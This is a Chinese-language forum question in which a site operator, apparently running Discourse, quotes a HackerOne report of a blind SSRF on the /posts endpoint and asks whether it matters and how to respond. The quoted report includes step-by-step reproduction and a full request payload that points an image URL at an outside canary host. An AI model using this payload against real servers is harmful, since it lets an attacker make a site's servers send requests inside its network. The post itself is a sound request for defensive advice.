我们收到了关于以下问题的 Hackerone 报告。
我想知道:
- 这是一个问题吗?
- 有什么建议/我可以采取的措施吗?
摘要:
你好,我在
hxxps://xyz.com/posts端点上发现了一个盲 SSRF。复现步骤:
- 在 xyz.com 上登录你的账户
- 前往私信(他们会有一个来自 discobot 的问候消息)
- 发送消息时,上传一张图片并在 burp 中拦截请求
- 在 payload 中将图片上传 URL 更改为你的 canary URL
- payload 将如下所示:
raw=![svg_image|690x388]>(hxxp://canarytokens.com/tags/images/terms/ctw75qckq1htf6n3rt9asrpn3/submit.aspx) &unlist_topic=false&category=&topic_id=1659497&is_warning=false&whisper=false&archetype=regular&composer_open_duration_msecs=12597&featured_link=&shared_draft=false&draft_key=topic_1659497&reply_to_post_number=83&image_sizes[hxxps://xyz.cloudfront.net/uploads/default/original/4X/c/a/9/ca90daba5408ce8b8693f3a5d58e537eb750e906.svg][width]=5120&image_sizes[hxxps://xyz.cloudfront.net/uploads/default/original/4X/c/a/9/ca90daba5408ce8b8693f3a5d58e537eb750e906.svg][height]=2880&nested_post=true
- 发送请求时,将触发两个 canary 警报,或者检查服务器日志,会有一个来自 Ruby 用户代理的请求和一个来自他们的 Amazon Compute Instance 的请求。
影响
该漏洞允许攻击者在 xyz.com 实例的网络内部发起任意 HTTP/HTTPS 请求。
从这个帖子来看,这似乎是由于 onebox 的行为导致的 https://meta.discourse.org/t/server-side-request-forgery-vulnerability/186996。
我还看到了几年前的这个 hackerone 报告 SSRF in upload IMG through URL。
谢谢!